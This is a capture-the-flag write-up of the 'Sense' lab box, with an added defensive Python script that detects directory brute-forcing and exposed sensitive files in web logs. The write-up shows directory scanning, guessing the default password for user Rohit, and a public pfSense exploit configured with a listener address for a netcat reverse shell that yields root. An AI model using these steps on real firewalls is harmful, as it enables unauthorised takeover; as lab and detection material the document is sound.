Summary
Sense is an easy Linux box that can be exploited by performing a directory brute-force to identify the login page of pfSense. The brute-force also identifies a file that contains credentials for pfSense. This combination was used to exploit pfSense with a public exploit and obtain a root shell.
Discovery
Nmap discovered the following open ports and services:
nmap -sC -sV -oN fullscan -Pn 10.129.94.74
PORT STATE SERVICE
80/tcp open http
443/tcp open https
Gobuster found the following locations:
https://10.129.94.74:443/system.php
https://10.129.94.74:443/changelog.txt (Status: 200)
https://10.129.94.74:443/system-users.txt (Status: 200)
https://10.129.94.74:443/xmlrpc.php (Status: 200) [Size: 384]
The page https://10.129.94.74/changelog.txt showed the following message:
# Security Changelog
### Issue
There was a failure in updating the firewall. Manual patching is therefore required
### Mitigated
2 of 3 vulnerabilities have been patched.
### Timeline
The remaining patches will be installed during the next maintenance window
This strongly suggests that an unpatched vulnerability is present. The page https://10.129.94.74/system-users.txt revealed an active user:
####Support ticket###
Please create the following user
username: Rohit
password: company defaults
After a couple of tries, the default combination was found to be rohit:pfsense.
With these credentials the user is authenticated to the pfSense dashboard.
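The discovery phase above leaves two traces a defender can act on: a burst of 404 responses from one address while a wordlist is walked, and a successful response for a file such as system-users.txt that should never sit in a firewall's web root. The following Python script is an added example, not part of the original writeup or of pfSense; it parses Combined Log Format lines (the format nginx, which serves the pfSense web UI, writes by default), flags both patterns, and runs on a small set of log lines constructed inline. The sensitive-path list, the window of 60 seconds and the threshold of 20 misses are assumptions chosen for the example.

```python
"""Detect directory brute-forcing and sensitive-file exposure in web access logs.

Added example, not code from the Sense writeup or from pfSense. It reads
Combined Log Format lines and reports:
  * a source IP that produces many 404s inside a short window (the signature
    of a wordlist scanner such as gobuster), and
  * any 2xx response for a path that should never be served from the web
    root, such as the system-users.txt found on this box.
Every log line used below is constructed for this example.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Paths that should never return content from a firewall's web root (assumed list).
SENSITIVE_PATHS = {"/system-users.txt", "/changelog.txt", "/.git/config", "/backup.tgz"}


def parse_line(line):
    """Parse one Combined Log Format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    rec["path"] = rec["path"].split("?", 1)[0]  # drop any query string
    return rec


def analyze(lines, window_seconds=60, threshold=20):
    """Return a list of finding dicts for the given log lines (in log order)."""
    findings = []
    recent_404 = defaultdict(deque)  # ip -> timestamps of its recent 404s
    already_flagged = set()
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, ts, path, status = rec["ip"], rec["ts"], rec["path"], rec["status"]
        # Rule 1: a file that should not exist in the web root was actually served.
        if 200 <= status < 300 and path in SENSITIVE_PATHS:
            findings.append({"type": "sensitive_file_served", "ip": ip, "path": path})
        # Rule 2: sliding window of 404s per source; flag once when it fills up.
        if status == 404:
            q = recent_404[ip]
            q.append(ts)
            while q and (ts - q[0]).total_seconds() > window_seconds:
                q.popleft()
            if len(q) >= threshold and ip not in already_flagged:
                already_flagged.add(ip)
                findings.append({"type": "dir_bruteforce", "ip": ip, "count_404": len(q)})
    return findings


def sample_log():
    """Constructed log lines: one ordinary client and one scanner (192.0.2.10 is a documentation address)."""
    base = datetime(2024, 3, 17, 10, 0, 0, tzinfo=timezone.utc)

    def fmt(ip, offset, path, status, size=0):
        ts = (base + timedelta(seconds=offset)).strftime("%d/%b/%Y:%H:%M:%S %z")
        return f'{ip} - - [{ts}] "GET {path} HTTP/1.1" {status} {size} "-" "Mozilla/5.0"'

    lines = [fmt("10.0.0.5", 0, "/", 200, 1234),
             fmt("10.0.0.5", 3, "/index.php", 200, 5678),
             fmt("10.0.0.5", 5, "/favicon.ico", 404)]
    # A wordlist walk: 25 misses in 25 seconds from a single address.
    lines += [fmt("192.0.2.10", i, f"/wordlist-entry-{i}", 404) for i in range(25)]
    # ...followed by hits on files that should not have been in the web root.
    lines += [fmt("192.0.2.10", 26, "/system-users.txt", 200, 110),
              fmt("192.0.2.10", 27, "/changelog.txt", 200, 271)]
    return lines


if __name__ == "__main__":
    for finding in analyze(sample_log()):
        print(finding)
```

On real logs, point `analyze` at the lines of the web server's access log; the two rules are independent, so a sensitive file served to an address that never tripped the 404 threshold is still reported, which matters because a scanner using a short, well-chosen wordlist may never reach the threshold at all.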
Exploitation
Searchsploit was used to identify vulnerabilities within pfSense, since changelog.txt suggested there is an unpatched vulnerability.
jeroen@kali:~$ searchsploit pfsense injection
---------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------- ---------------------------------
Pfsense 2.3.4 / 2.4.4-p3 - Remote Code Injection | php/webapps/47413.py
pfSense < 2.1.4 - 'status_rrd_graph_img.php' Command Injection | php/webapps/43560.py
---------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
The following public exploit was used for this vulnerability: https://github.com/spencerdodd/pfsense-code-exec/blob/master/pfsense_exec.py
The script was modified as follows:
username = "rohit"
password = "pfsense"
listener_ip = "10.10.14.24"
listener_port = "4444"
target_ip = "10.129.94.74"
url = "https://{}/".format(target_ip)
proxied_url = "https://127.0.0.1:31337/"
A netcat listener was set up and the script was run with: python pfsense_exec.py nc
This provided a root shell. From here the root.txt and user.txt can be retrieved.
Conclusion
This was a very easy box that could be exploited by properly brute-forcing for files and directories. The exploitation of pfSense was straightforward so it didn’t take too long to root this box. Hope you had the same and enjoyed this writeup!